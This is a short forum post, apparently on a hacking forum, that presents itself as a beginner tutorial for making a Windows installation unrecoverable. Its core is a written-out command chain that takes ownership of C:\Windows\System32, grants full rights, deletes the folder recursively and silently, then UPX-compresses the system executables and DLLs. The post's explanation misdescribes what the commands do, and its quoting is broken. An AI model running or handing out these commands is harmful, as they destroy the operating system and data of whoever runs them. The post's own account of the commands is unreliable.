Login Register
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


[Noob Tutorial] How to damage a Windows install and make it unrecoverable! filter_list
Author
Message
[Noob Tutorial] How to damage a Windows install and make it unrecoverable! #1
The idea here is to damage a Windows install and make it unrecoverable. Since i couldn't find a simple one way crypter than i use upx.

REQUIRE ADMIN PRIVILEGES AND NEED UPX
Code:
takeown /R /A /F C:\Windows\System32 /D N icacls C:\Windows\System32 /grant Administrators:F /T /C rd /s /q C:\Windows\system32 upx.exe -9 "C:\Windows\System32\*.exe upx.exe -9 "C:\Windows\System32\*.dll

The code above will remove system privileges in C:\Windows\System32 and compress all exes and dlls not being used by the system. This will make C:\Windows\System32 smaller and unusable specially if compressing the dlls.

Reply







Users browsing this thread: 1 Guest(s)